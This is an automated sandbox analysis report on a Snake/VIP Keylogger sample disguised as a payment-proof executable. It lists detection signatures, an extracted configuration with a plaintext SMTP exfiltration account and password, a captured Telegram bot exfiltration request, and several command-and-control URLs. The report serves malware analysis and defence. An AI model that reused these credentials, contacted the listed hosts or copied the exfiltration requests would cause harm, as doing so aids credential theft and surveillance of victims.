Windows Analysis Report
z30ProofofPaymentAttached.exe

Overview

General Information

Sample name: z30ProofofPaymentAttached.exe
Analysis ID: 1557792
MD5: a2c61107b1d0bd03a8133c81b02fe6d8
SHA1: b27273c26424a5ab644440485196b506ed5e4ee7
SHA256: f0e637afd17905703f31d1efa7b5c847687560311ecec72b7f84352b4e3c66fc
Tags: exeSnakeKeyloggeruser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587", "Version": "4.4"}
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sender24@mzgold.ir", "Password": "^Wg7~Wau!C8H", "Host": "mzgold.ir", "Port": "587"}
Multi AV Scanner detection for submitted file
Source: z30ProofofPaymentAttached.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for sample
Source: z30ProofofPaymentAttached.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: z30ProofofPaymentAttached.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00FF6CA9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_00FF60DD
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_00FF63F9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00FFEB60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00FFF5FA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFF56F FindFirstFileW,FindClose, 1_2_00FFF56F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_01001B2F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_01001C8A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01001F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_01001F94
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0141F45Dh 7_2_0141F2C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0141F45Dh 7_2_0141F52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0141F45Dh 7_2_0141F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0141FC19h 7_2_0141F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C0D0Dh 7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C1697h 7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CFAB9h 7_2_067CF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C2C19h 7_2_067C2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C31E0h 7_2_067C2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_067C0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CE501h 7_2_067CE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CE0A9h 7_2_067CDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CE959h 7_2_067CE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CF209h 7_2_067CEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CEDB1h 7_2_067CEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CF661h 7_2_067CF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_067C0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_067C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CD3A1h 7_2_067CD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CCF49h 7_2_067CCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CD7F9h 7_2_067CD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C31E0h 7_2_067C310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067C31E0h 7_2_067C2DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 067CDC51h 7_2_067CD9A8

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49813 -> 217.144.107.148:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.7:49813 -> 217.144.107.148:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01004EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_01004EB5
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mzgold.ir
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 15:32:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mzgold.ir
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r10.i.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.org0#
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
